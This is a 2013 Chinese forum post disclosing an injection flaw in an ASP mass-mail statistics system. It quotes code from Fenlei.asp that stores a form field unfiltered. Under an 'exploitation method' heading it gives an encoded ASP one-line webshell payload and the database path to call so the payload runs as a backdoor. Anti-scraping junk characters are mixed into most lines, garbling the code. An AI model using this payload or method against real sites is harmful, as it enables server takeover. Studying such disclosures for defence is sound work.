找回密码
 立即注册
查看: 2732|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
2 h  R" l* z/ P+ b
& e+ o0 i7 S3 n" |IF Request.QueryString("Action")="del" Then 7 d" E3 n  o+ Q9 C! x
ID=Request.QueryString("ID")
: f- _3 r' Z, W. R& M: J) PIF Countss ("tui","Fenlei",ID )<>0 then
5 |# w7 b. y) ^'略
7 y5 X" g& Q1 @+ c! Y8 QIF Request.QueryString("Action")="Add" Then
0 N" C0 `6 ^, j& g* {' aTname=Request.Form("Typename")
8 V0 i9 Z! s  E; n/ P4 \9 v: C- lSet Rs=Server.CreateObject("adodb.Recordset") 1 F( B+ d3 o4 j$ i
Sql="Select * From Fenlei Order by id Desc " 6 H$ n( d6 |; u. ]# @3 I7 c' c3 V
Rs.Open Sql,Conn,1,3
$ g# ~( p6 c3 j" i0 IRs.Addnew
2 M4 w7 P* Y1 L' }, q1 ERs("Typename")=Tname
/ U" ~, @& V0 P0 f4 d'略
: U4 p# f1 N5 I- F3 d: PSet Rs=Server.CreateObject("adodb.Recordset") $ d# D( f  J2 R0 Y6 \! w; K: ?
Sql="Select * From Fenlei Order by id Desc "
8 f. N% T7 X6 o' h# x  h1 YRs.Open Sql,Conn,1,1 % z: B& b7 a# S0 Y4 @
'略
0 f  Y0 g6 @0 I2 H$ h; U3 Z4 m! }%>
6 q/ `; C; M6 C( r7 N
% {' M" v$ j5 p2 U: s+ u7 ~
6 h/ g5 T% @9 `2 y+ U% F5 r
. d( T3 k% X# a0 T1 b没有过滤,直接写入数据库。/ }/ ]+ r$ c0 E" \$ z+ E! \' }) S

5 F, l8 @( \+ a! i6 F; L利用方法:  F# X; X' |2 F2 J  p
, M; j) x9 n) }/ a4 j% e& n' W
插入:┼攠數畣整爠煥敵瑳∨≡┩>
, E$ C! J! L: u' n 4 D% ?; G3 ~) S: n7 \! e( `6 u

2 M/ I, i  f' h连接: http://www.xxx.com/###tongbaner.asa
3 N" _. ]: V7 J8 N'默认安装文件:
+ o0 L$ P/ e1 n) ], M2 y9 x! C'install.asp
4 F- Q$ ~% ~* [& `8 `; \7 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表